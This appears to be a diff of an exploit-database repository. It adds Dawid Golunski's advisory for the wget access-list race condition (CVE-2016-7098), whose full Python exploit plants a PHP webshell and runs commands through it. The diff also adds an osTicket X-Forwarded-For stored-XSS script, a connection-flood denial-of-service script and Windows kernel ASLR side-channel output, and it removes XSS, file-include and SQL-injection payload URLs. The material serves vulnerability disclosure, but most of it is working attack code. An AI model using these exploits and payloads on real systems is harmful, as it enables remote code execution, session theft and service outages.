+- Discovered by: Dawid Golunski
+- dawid[at]legalhackers.com
+- https://legalhackers.com
+- https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
+
+- CVE-2016-7098
+- Release date: 24.11.2016
+- Revision 1.0
+- Severity: Medium
+=============================================
+
+
+I. VULNERABILITY
+-------------------------
+
+GNU Wget < 1.18       Access List Bypass / Race Condition
+
+
+II. BACKGROUND
+-------------------------
+
+"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and 
+FTP, the most widely-used Internet protocols. 
+It is a non-interactive commandline tool, so it may easily be called from 
+scripts, cron jobs, terminals without X-Windows support, etc.
+
+GNU Wget has many features to make retrieving large files or mirroring entire 
+web or FTP sites easy
+"
+
+https://www.gnu.org/software/wget/
+
+
+III. INTRODUCTION
+-------------------------
+
+GNU wget in version 1.17 and earlier, when used in mirroring/recursive mode, 
+is affected by a Race Condition vulnerability that might allow remote attackers 
+to bypass intended wget access list restrictions specified with -A parameter.
+This might allow attackers to place malicious/restricted files onto the system. 
+Depending on the application / download directory, this could potentially lead 
+to other vulnerabilities such as code execution etc.
+
+
+IV. DESCRIPTION
+-------------------------
+
+When wget is used in recursive/mirroring mode, according to the manual it can 
+take the following access list options:
+
+"Recursive Accept/Reject Options:
+  -A acclist --accept acclist
+  -R rejlist --reject rejlist
+
+Specify comma-separated lists of file name suffixes or patterns to accept or 
+reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in 
+an element of acclist or rejlist, it will be treated as a pattern, rather 
+than a suffix."
+
+
+These can for example be used to only download JPG images. 
+
+It was however discovered that when a single file is requested with recursive 
+option (-r / -m) and an access list ( -A ), wget only applies the checks at the
+end of the download process. 
+
+This can be observed in the output below:
+
+# wget -r -nH -A '*.jpg' http://attackersvr/test.php
+Resolving attackersvr... 192.168.57.1
+Connecting to attackersvr|192.168.57.1|:80... connected.
+HTTP request sent, awaiting response... 200 OK
+Length: unspecified [text/plain]
+Saving to: ‘test.php’
+
+15:05:46 (27.3 B/s) - ‘test.php’ saved [52]
+
+Removing test.php since it should be rejected.
+
+FINISHED
+
+
+Although wget deletes the file at the end of the download process, this creates 
+a race condition as an attacker with control over the URL/remote server could 
+intentionally slow down the download process so that they had a chance to make 
+use of the malicious file before it gets deleted.
+
+It is very easy to win the race as the file only gets deleted after the HTTP 
+connection is terminated. The attacker could therefore keep the connection open 
+as long as it was necessary to make use of the uploaded file as demonstrated
+in the proof of concept below.
+
+
+V. PROOF OF CONCEPT EXPLOIT
+------------------------------
+
+
+Here is a simple vulnerable PHP web application that uses wget to download 
+images from a user-provided server/URL:
+
+
+---[ image_importer.php ]---
+
+<?php
+        // Vulnerable webapp [image_importer.php]
+        // Uses wget to import user images from provided site URL 
+        // It only accepts JPG files (-A wget option).
+
+        if ( isset($_GET['imgurl']) ) {
+                $URL = escapeshellarg($_GET['imgurl']);
+        } else {
+                die("imgurl parameter missing");
+        }
+
+        if ( !file_exists("image_uploads") ) {
+                mkdir("image_uploads");
+        }
+
+        // Download user JPG images into /image_uploads directory
+        system("wget -r -nH -P image_uploads -A '*.jpg' $URL 2>&1");
+?>
+
+
+----------------------------
+
+
+For example:
+https://victimsvr/image_importer.php?imgurl= href="http://images/logo.jpg">http://images/logo.jpg
+
+will cause wget to upload logo.jpg file into:
+https://victimsvr/images_uploads/logo.jpg
+
+The wget access list (-A) is to ensure that only .jpg files get uploaded.
+
+However due to the wget race condition vulnerability an attacker could use 
+the exploit below to upload an arbitrary PHP script to /image_uploads directory
+and achieve code execution.
+
+
+---[ wget-race-exploit.py ]---
+'''
+
+#!/usr/bin/env python
+
+#
+# Wget < 1.18  Access List Bypass / Race Condition PoC Exploit
+# CVE-2016-7098
+#
+# Dawid Golunski
+# https://legalhackers.com
+#
+#
+# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious
+# file for long enough to take advantage of it.
+# The exploit sets up a web server on port 80 and waits for a download request from wget.
+# It then supplies a PHP webshell payload and requests the uploaded file before it gets
+# removed by wget. 
+#
+# Adjust target URL (WEBSHELL_URL) before executing.
+# 
+# Full advisory at:
+#
+# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
+#
+# Disclaimer:
+#
+# For testing purposes only. Do no harm.
+#
+# 
+
+import SimpleHTTPServer
+import time
+import SocketServer
+import urllib2
+import sys
+
+HTTP_LISTEN_IP = '0.0.0.0'
+HTTP_LISTEN_PORT = 80
+
+PAYLOAD='''
+<?php
+	//our webshell
+	system($_GET["cmd"]);
+	system("touch /tmp/wgethack");
+?>
+'''
+
+# Webshell URL to be requested before the connection is closed 
+# i.e before the uploaded "temporary" file gets removed.
+WEBSHELL_URL="http://victimsvr/image_uploads/webshell.php"
+
+# Command to be executed through 'cmd' GET paramter of the webshell
+CMD="/usr/bin/id"
+
+
+class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
+   def do_GET(self):
+       # Send the payload on GET request
+       print "[+] Got connection from wget requesting " + self.path + " via GET :)\n"
+       self.send_response(200)
+       self.send_header('Content-type', 'text/plain')
+       self.end_headers()
+       self.wfile.write(PAYLOAD)
+       print "\n[+] PHP webshell payload was sent.\n"
+
+       # Wait for the file to be flushed to disk on remote host etc.
+       print "[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\n"
+       time.sleep(2)
+
+       # Request uploaded webshell
+       print "[+} File '" + self.path + "' should be saved by now :)\n"
+       print "[+} Executing " + CMD + " via webshell URL: " + WEBSHELL_URL + "?cmd=" + CMD + "\n"
+       print "[+} Command result: "
+       print urllib2.urlopen(WEBSHELL_URL+"?cmd="+CMD).read()
+
+       print "[+} All done. Closing HTTP connection...\n"
+       # Connection will be closed on request handler return
+       return
+
+handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
+
+print "\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098\n\nDawid Golunski \nhttps://legalhackers.com \n"
+print "[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\n" % HTTP_LISTEN_PORT
+
+handler.serve_forever()
+
+'''
+------------------------------
+
+If the attacker run this exploit on their server ('attackersver') and pointed 
+the vulnerable script image_importer.php at it via URL:
+
+https://victimsvr/image_importer.php?imgurl= href="http://attackersvr/webshell.php">http://attackersvr/webshell.php
+
+The attacker will see output similar to:
+
+
+
+root@attackersvr:~# ./wget-race-exploit.py 
+
+Wget < 1.18 Access List Bypass / Race Condition PoC Exploit 
+CVE-2016-7098
+
+Dawid Golunski 
+https://legalhackers.com 
+
+[+} Exploit Web server started on HTTP port 80. Waiting for wget to connect...
+
+[+] Got connection from wget requesting /webshell.php via GET :)
+
+victimsvr - - [24/Nov/2016 00:46:18] "GET /webshell.php HTTP/1.1" 200 -
+
+[+] PHP webshell payload was sent.
+
+[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...
+
+[+} File '/webshell.php' should be saved by now :)
+
+[+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id
+
+[+} Command result: 
+
+uid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd)
+
+[+} All done. Closing HTTP connection...
+
+
+
+VI. BUSINESS IMPACT
+-------------------------
+
+The vulnerability might allow remote servers to bypass intended wget access list 
+restrictions to temporarily store a malicious file on the server. 
+In certain cases, depending on the context wget command was used in and download
+path, this issue could potentially lead to other vulnerabilities such as
+script execution as shown in the PoC section.
+ 
+VII. SYSTEMS AFFECTED
+-------------------------
+
+Wget < 1.18
+ 
+VIII. SOLUTION
+-------------------------
+
+Update to latest version of wget 1.18 or apply patches provided by the vendor.
+ 
+IX. REFERENCES
+-------------------------
+
+https://legalhackers.com
+
+https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
+
+https://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py
+
+https://www.gnu.org/software/wget/
+
+https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098
+
+https://security-tracker.debian.org/tracker/CVE-2016-7098
+
+http://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html
+
+http://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html
+
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098
+
+
+X. CREDITS
+-------------------------
+
+The vulnerability has been discovered by Dawid Golunski
+dawid (at) legalhackers (dot) com
+
+https://legalhackers.com
+ 
+XI. REVISION HISTORY
+-------------------------
+
+24.11.2016 - Advisory released
+ 
+XII. LEGAL NOTICES
+-------------------------
+
+The information contained within this advisory is supplied "as-is" with
+no warranties or guarantees of fitness of use or otherwise. I accept no
+responsibility for any damage caused by the use or misuse of this information.
+'''

platforms/php/webapps/25990.txt

@@ -4,5 +4,4 @@ A cross-site scripting vulnerability affects Clever Copy. This issue is due to a
 
 An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 
 
-http://www.example.com/calendar.php?mth=3&yr=2006"><script src=
-"http://www.example.com/dev/injection/js.js"></script> 
+http://www.example.com/calendar.php?mth=3&yr=2006"><script src="http://www.example.com/dev/injection/js.js"></script> 

platforms/php/webapps/31675.txt

@@ -1,10 +0,0 @@
-source: http://www.securityfocus.com/bid/28861/info
-
-Aterr is prone to local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
-
-An attacker can exploit these vulnerabilities using directory-traversal strings to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
-
-The issues affect Aterr 0.9.1; other versions might also be affected.
-
-http://www.example.com/path/include/functions.inc.php?class=[Local File]
-http://www.example.com/path/include/common.inc.php?file=[Local File] 

platforms/php/webapps/31712.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/28957/info
-
-miniBB is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
-
-An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
-
-miniBB 2.2a is vulnerable; other versions may also be affected.
-
-http://www.example.com/bb_admin.php?action=searchusers2&whatus=" /> <script>alert(document.cookie)</script>&searchus=id

platforms/php/webapps/33927.txt

@@ -1,7 +0,0 @@
-source: http://www.securityfocus.com/bid/39905/info
-
-eZoneScripts Apartment Search Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
-
-Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
-
-http://www.example.com/productdemos/ApartmentSearch/listtest.php?r=-1 union select 0,user()-- 

platforms/php/webapps/40826.py

@@ -0,0 +1,168 @@
+# Exploit Title: Osticket 1.9.14 and below (X-Forwarded-For) Stored XSS.
+# Date: 24-11-2016
+# Exploit Author: Joaquin Ramirez Martinez [ i0-SEC ]
+# Software Link: http://osticket.com/
+# Vendor: Osticket
+
+"""
+==============
+ DESCRIPTION
+==============
+
+**osTicket** is a widely-used open source support ticket system. It seamlessly
+integrates inquiries created via email, phone and web-based forms into a
+simple easy-to-use multi-user web interface. Manage, organize and archive
+all your support requests and responses in one place while providing your
+customers with accountability and responsiveness they deserve.
+
+(copy of Osticket - README.md)
+
+=======================
+ VULNERABILITY DETAILS
+=======================
+
+file `osticket/upload/bootstrap.php` contains this 
+snippet of code (line 337-340):
+
+  ...
+
+if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
+    // Take the left-most item for X-Forwarded-For
+    $_SERVER['REMOTE_ADDR'] = trim(array_pop(
+        explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])));
+
+   ....
+
+The $_SERVER['REMOTE_ADDR'] value gets overrided with the `X-Forwarded-For` header value,
+at this point, it is not a vulnerability but...
+file `osticket/upload/include/class.osticket.php` line 309-315 :
+
+  ...
+
+//Save log based on system log level settings.
+        $sql='INSERT INTO '.SYSLOG_TABLE.' SET created=NOW(), updated=NOW() '
+            .',title='.db_input(Format::sanitize($title, true))
+            .',log_type='.db_input($loglevel[$level])
+            .',log='.db_input(Format::sanitize($message, false))
+            .',ip_address='.db_input($_SERVER['REMOTE_ADDR']);
+
+        db_query($sql, false);
+
+    ....
+
+
+Everytime when a csrf attack is dettected (checking `X_CSRFTOKEN` header or the post parameter `__CSRFToken__`), 
+Osticket saves into database the user controled value $_SERVER['REMOTE_ADDR'] even if it has an invalid format.
+
+Finally the XSS is triggered when a user who can see the system logs like an administrator, visits
+the /scp/logs.php URI. It happens because osticket does not encode the output of the data stored into the database.
+
+The code responsible for lanching the XSS is located in `osticket/upload/include/staff/syslogs.inc-php`
+line 142...
+
+...
+<td><?php echo $row['ip_address']; ?></td>
+...
+
+So...
+
+An attacker can make an HTTP request with a header `X-Forwarded-For` containing the XSS payload 
+with an invalid CSRF token to the login interface waiting for an administrator to view the logs and trigger the XSS.
+
+
+================
+  DEMONSTRATION
+================
+
+Demo video: https://www.youtube.com/watch?v=lx_WlL89F70
+
+The demo also show a low severity XSS vulnerability in the helpdesk name/title of osticket.
+
+
+================
+  REFERENCES
+================
+
+https://github.com/osTicket/osTicket/releases
+https://github.com/osTicket/osTicket/releases/tag/v1.9.15
+
+X-Forwarded-For XSS:
+
+https://github.com/osTicket/osTicket/pull/3439
+https://github.com/osTicket/osTicket/commit/4396f91cdc990b7da598a7562eb634b89314b631
+
+heldeskt name/tile XSS:
+
+https://github.com/osTicket/osTicket/pull/3439
+https://github.com/osTicket/osTicket/commit/2fb47bd84d1905b49beab05fcf3f01b00a171c37
+
+================
+  MITIGATIONS
+================
+
+update to version 1.9.15 or later
+
+================
+  CREDITS
+================
+
+Vulnerability discovered by Joaquin Ramirez Martinez
+  
+  https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q/videos
+  https://twitter.com/rammarj
+
+================
+  TIMELINE
+================
+
+13-07-2016 - Vulnerability found
+19-09-2016 - Osticket knew the flaws
+01-11-2016 - Osticket patches vulnerabilities (v1.9.15 released)
+24-11-2016 - Public disclosure.
+
+
+"""
+import urllib
+import urllib2
+from optparse import OptionParser
+
+options = OptionParser(usage='python %prog [options]', description='Stored XSS')
+options.add_option('-t', '--target', type='string', default='http://localhost', help='(required) example: http://localhost')
+options.add_option('-p', '--path', type='string', default='/', help='osticket path. Default: /')
+options.add_option('-x', '--payload', type='string', default='<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>'
+  , help='xss payload. Default: "<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>"')
+
+banner = """ 
+
+======================================================   
+                       OSTICKET 
+  "The most popular ticketing system in the world"
+                      Stored XSS
+
+            by i0-sec (Joaquin R. M.)
+======================================================
+
+"""
+
+def main():
+    opts,args = options.parse_args()    
+    print(banner)
+    server = opts.target
+    path = opts.path
+    body = urllib.urlencode({"__CSRFToken__":"invalid", "do":"scplogin", "userid":"invalid", "passwd":"invalid", "submit":""})    
+    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36",
+    "Content-type": "application/x-www-form-urlencoded", "X-Forwarded-For": opts.payload}
+    url = server+path+"/scp/login.php" #default login interface URI for OSTICKET
+    print('[+] Connecting to '+server+path)
+    req = urllib2.Request(url, body, headers)
+    try:
+      print('[+] Sending payload... ')
+      response = urllib2.urlopen(req)
+      html = response.read()
+    except Exception, e:
+      pass
+    print '[+] Payload sent.'
+    print '[+] Completed.\n'
+
+if __name__ == '__main__':
+    main()

platforms/windows/dos/40825.py

@@ -0,0 +1,22 @@
+# Exploit Title: Remote Utilities - Host 6.3 - Denial of Service
+# Date: 2016-11-25
+# Exploit Author: Peter Baris
+# Vendor Homepage: www.remoteutilities.com 
+# Software Link: http://saptech-erp.com.au/resources/executables/host6.3.zip
+# Version: 6.3.0.6 - (other version are also affected below version 6.5 beta 3)
+# Tested on: Windows 7 SP1 x64 and Windows Server 2008 R2 
+# After the notification, the company released a fix in version 6.5 beta 3
+# On Windows 7 - the software refuses connections after execution. 
+# On Windows 2008 R2 it caused 100% CPU usage and occasional server crash when 1 core was assigned
+
+
+#!/usr/bin/python
+import socket
+counter=0
+
+while (counter <= 5000):	
+	counter=counter+1
+	print(counter)
+	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	connect=s.connect(('<host address>',5650))
+	s.close()

platforms/windows/local/40823.txt

@@ -0,0 +1,866 @@
+Complete Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40823.zip
+
+Presentation:
+https://www.exploit-db.com/docs/40822.pdf
+
+
+I Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016
+
+Requirements
+
+Intel Processor (Haswell or newer)
+Windows 10 x64
+Usage
+
+Run ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:
+
+C:\Users\qa\Desktop>ASLRSideChannelAttack.exe
++] Setting thread affinity to CPU 0
++] Getting all the potential PML4 SelfRef
++] Mapping a page oracle
++] Allocating probing target pages...
+Allocation 0: 0000020E339D0000
+Allocation 1: 0000020E339E0000
+Allocation 2: 0000020E339F0000
+Allocation 3: 0000020E33A00000
+Allocation 4: 0000020E33A10000
+--------------------------
++] Check that Unammped and Mapped values are consistent across several executions!
+--------------------------
+Unmapped Initial: 256.683746
+Mapped Initial: 203.692978
+--------------------------
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
+--------------------------
+Unmapped: 247.440018
+Mapped: 202.827560
+--------------------------
+
+Potential SelfRef: FFFF8140A0502810
++] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213
++] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563
++] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382
++] PTE FFFF81010719D000 looks mapped! - Time: 197.297256
++] PTE FFFF81010719D080 looks mapped! - Time: 194.501175
++] PTE FFFF810804020100 looks mapped! - Time: 204.740097
++] Removing 102 from initial array and pushing it into final array
+Potential SelfRef: FFFF81C0E0703818
++] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616
++] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774
++] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921
++] PTE FFFF81810719D000 looks mapped! - Time: 202.525726
++] PTE FFFF81810719D080 looks mapped! - Time: 208.673874
+Time difference exceed for ffff818804020100, retrying...
++] PTE FFFF818804020100 looks mapped! - Time: 209.071213
++] Removing 103 from initial array and pushing it into final array
+Time difference exceed for ffff824120904820, retrying...
+Potential SelfRef: FFFF824120904820
++] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642
+Time difference exceed for ffff82010719cf00, retrying...
++] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593
++] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344
++] PTE FFFF82010719D000 looks mapped! - Time: 207.820862
++] PTE FFFF82010719D080 looks mapped! - Time: 197.229263
++] PTE FFFF820804020100 looks mapped! - Time: 204.585739
++] Removing 104 from initial array and pushing it into final array
+Potential SelfRef: FFFF82C160B05828
++] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003
+Time difference exceed for ffff8341a0d06830, retrying...
+Potential SelfRef: FFFF8341A0D06830
++] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657
++] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697
++] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016
++] PTE FFFF83010719D000 looks mapped! - Time: 214.013504
++] PTE FFFF83010719D080 looks mapped! - Time: 191.688126
++] PTE FFFF830804020100 looks mapped! - Time: 193.314758
++] Removing 106 from initial array and pushing it into final array
+Potential SelfRef: FFFF83C1E0F07838
++] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973
++] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693
++] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097
++] PTE FFFF83810719D000 looks mapped! - Time: 216.298660
++] PTE FFFF83810719D080 looks mapped! - Time: 203.848816
++] PTE FFFF838804020100 looks mapped! - Time: 204.008743
++] Removing 107 from initial array and pushing it into final array
+Time difference exceed for ffff89c4e2713898, retrying...
+Time difference exceed for ffff8bc5e2f178b8, retrying...
+Time difference exceed for ffff8c46231188c0, retrying...
+Unmapped Initial: 248.508636
+Mapped Initial: 207.139847
+--------------------------
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
+--------------------------
+Unmapped: 236.360733
+Mapped: 195.650040
+--------------------------
+
+Potential SelfRef: FFFF8140A0502810
++] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363
+Potential SelfRef: FFFF81C0E0703818
+Time difference exceed for ffff81810719ce80, retrying...
+Time difference exceed for ffff81810719ce80, retrying...
+Time difference exceed for ffff81810719ce80, retrying...
+Time difference exceed for ffff81810719ce80, retrying...
++] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393
+Time difference exceed for ffff81810719cf00, retrying...
++] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645
++] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724
++] PTE FFFF81810719D000 looks mapped! - Time: 197.655167
++] PTE FFFF81810719D080 looks mapped! - Time: 201.667160
++] PTE FFFF818804020100 looks mapped! - Time: 195.728439
+PML4e: FFFF8140A0502810 - Index: 102
+PML4e: FFFF81C0E0703818 - Index: 103
+PML4e: FFFF824120904820 - Index: 104
+PML4e: FFFF8341A0D06830 - Index: 106
+PML4e: FFFF83C1E0F07838 - Index: 107
+KNOWN_UNMAPPED PTE: ffff818000000000
+-] Erasing 103 from final array
+Potential SelfRef: FFFF824120904820
++] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759
++] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019
++] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364
++] PTE FFFF82010719D000 looks mapped! - Time: 203.052826
++] PTE FFFF82010719D080 looks mapped! - Time: 194.115143
++] PTE FFFF820804020100 looks mapped! - Time: 198.158585
+PML4e: FFFF8140A0502810 - Index: 102
+PML4e: FFFF824120904820 - Index: 104
+PML4e: FFFF8341A0D06830 - Index: 106
+PML4e: FFFF83C1E0F07838 - Index: 107
+KNOWN_UNMAPPED PTE: ffff820000000000
+-] Erasing 104 from final array
+Potential SelfRef: FFFF8341A0D06830
++] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823
++] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525
++] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040
++] PTE FFFF83010719D000 looks mapped! - Time: 196.066254
++] PTE FFFF83010719D080 looks mapped! - Time: 189.007034
++] PTE FFFF830804020100 looks mapped! - Time: 197.613953
+PML4e: FFFF8140A0502810 - Index: 102
+PML4e: FFFF8341A0D06830 - Index: 106
+PML4e: FFFF83C1E0F07838 - Index: 107
+KNOWN_UNMAPPED PTE: ffff830000000000
+-] Erasing 106 from final array
+Potential SelfRef: FFFF83C1E0F07838
++] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380
+Time difference exceed for ffff83810719cf00, retrying...
+Time difference exceed for ffff83810719cf00, retrying...
+Unmapped Initial: 232.123840
+Mapped Initial: 196.420654
+--------------------------
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
+--------------------------
+Unmapped: 234.845581
+Mapped: 187.862518
+--------------------------
+
+Potential SelfRef: FFFF8140A0502810
++] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938
++] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766
+Time difference exceed for ffff81010719cf80, retrying...
+Time difference exceed for ffff81010719cf80, retrying...
+Time difference exceed for ffff81010719cf80, retrying...
++] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784
++] PTE FFFF81010719D000 looks mapped! - Time: 194.332733
++] PTE FFFF81010719D080 looks mapped! - Time: 200.211182
++] PTE FFFF810804020100 looks mapped! - Time: 199.812225
+PML4e: FFFF8140A0502810 - Index: 102
+PML4e: FFFF83C1E0F07838 - Index: 107
+KNOWN_UNMAPPED PTE: ffff810000000000
+Time difference exceed for ffff810000000000, retrying...
+-] Erasing 102 from final array
+Time difference exceed for ffff83c1e0f07838, retrying...
+Potential SelfRef: FFFF83C1E0F07838
+Time difference exceed for ffff83810719ce80, retrying...
+Time difference exceed for ffff83810719ce80, retrying...
+Unmapped Initial: 230.247162
+Mapped Initial: 198.023987
+--------------------------
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
+--------------------------
+Unmapped: 235.923035
+Mapped: 191.605301
+--------------------------
+
+Time difference exceed for ffff83c1e0f07838, retrying...
+Time difference exceed for ffff83c1e0f07838, retrying...
+Potential SelfRef: FFFF83C1E0F07838
+Time difference exceed for ffff83810719ce80, retrying...
+Time difference exceed for ffff83810719ce80, retrying...
+Time difference exceed for ffff83810719ce80, retrying...
+Time difference exceed for ffff83810719ce80, retrying...
+Time difference exceed for ffff83810719ce80, retrying...
+Unmapped Initial: 258.041046
+Mapped Initial: 210.309753
+--------------------------
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
+--------------------------
+Unmapped: 238.757538
+Mapped: 203.896240
+--------------------------
+
+Potential SelfRef: FFFF83C1E0F07838
++] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102
++] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836
++] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333
++] PTE FFFF83810719D000 looks mapped! - Time: 197.218445
++] PTE FFFF83810719D080 looks mapped! - Time: 203.334763
++] PTE FFFF838804020100 looks mapped! - Time: 203.243607
+PML4e: FFFF83C1E0F07838 - Index: 107
+KNOWN_UNMAPPED PTE: ffff838000000000
+-] Erasing 107 from final array
+Potential SelfRef: FFFF82C160B05828
++] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221
++] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138
++] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006
++] PTE FFFF82810719D000 looks mapped! - Time: 209.909943
++] PTE FFFF82810719D080 looks mapped! - Time: 202.795639
++] PTE FFFF828804020100 looks mapped! - Time: 196.754044
++] Removing 105 from initial array and pushing it into final array
+Time difference exceed for ffff884422110880, retrying...
+Time difference exceed for ffff884422110880, retrying...
+Time difference exceed for ffff8ec763b1d8e8, retrying...
+Time difference exceed for ffff8ec763b1d8e8, retrying...
+Time difference exceed for ffff8ec763b1d8e8, retrying...
+Time difference exceed for ffff8ec763b1d8e8, retrying...
+Time difference exceed for ffff90c864321908, retrying...
+Unmapped Initial: 257.754272
+Mapped Initial: 207.903702
+--------------------------
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
+--------------------------
+Unmapped: 247.145935
+Mapped: 207.792923
+--------------------------
+
+Potential SelfRef: FFFF82C160B05828
++] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092
++] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715
++] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614
++] PTE FFFF82810719D000 looks mapped! - Time: 213.698837
++] PTE FFFF82810719D080 looks mapped! - Time: 210.162796
++] PTE FFFF828804020100 looks mapped! - Time: 208.765045
+PML4e: FFFF82C160B05828 - Index: 105
+KNOWN_UNMAPPED PTE: ffff828000000000
+-] Erasing 105 from final array
+-] Removing 100 as it seems to be unmapped
+-] Removing 101 as it seems to be unmapped
+-] Removing 108 as it seems to be unmapped
+-] Removing 109 as it seems to be unmapped
+-] Removing 10a as it seems to be unmapped
+-] Removing 10b as it seems to be unmapped
+-] Removing 10c as it seems to be unmapped
+-] Removing 10d as it seems to be unmapped
+Time difference exceed for ffff8743a1d0e870, retrying...
+-] Removing 10e as it seems to be unmapped
+-] Removing 10f as it seems to be unmapped
+-] Removing 110 as it seems to be unmapped
+Time difference exceed for ffff88c462311888, retrying...
+-] Removing 111 as it seems to be unmapped
+-] Removing 112 as it seems to be unmapped
+-] Removing 113 as it seems to be unmapped
+Time difference exceed for ffff8a45229148a0, retrying...
+-] Removing 114 as it seems to be unmapped
+-] Removing 115 as it seems to be unmapped
+-] Removing 116 as it seems to be unmapped
+-] Removing 117 as it seems to be unmapped
+Time difference exceed for ffffbc5e2f178bc0, retrying...
+Time difference exceed for ffffbc5e2f178bc0, retrying...
+Time difference exceed for ffffe8f47a3d1e88, retrying...
+Potential SelfRef: FFFFF67B3D9ECF60
++] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379
++] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694
++] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502
++] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920
++] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059
++] PTE FFFFF60804020100 looks mapped! - Time: 211.636246
++] Removing 1ec from initial array and pushing it into final array
+Unmapped Initial: 233.678802
+Mapped Initial: 214.496124
+--------------------------
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
++] Measures are not consistent yet...
+--------------------------
+Unmapped: 250.585373
+Mapped: 213.339661
+--------------------------
+
+Potential SelfRef: FFFFF67B3D9ECF60
++] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174
++] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457
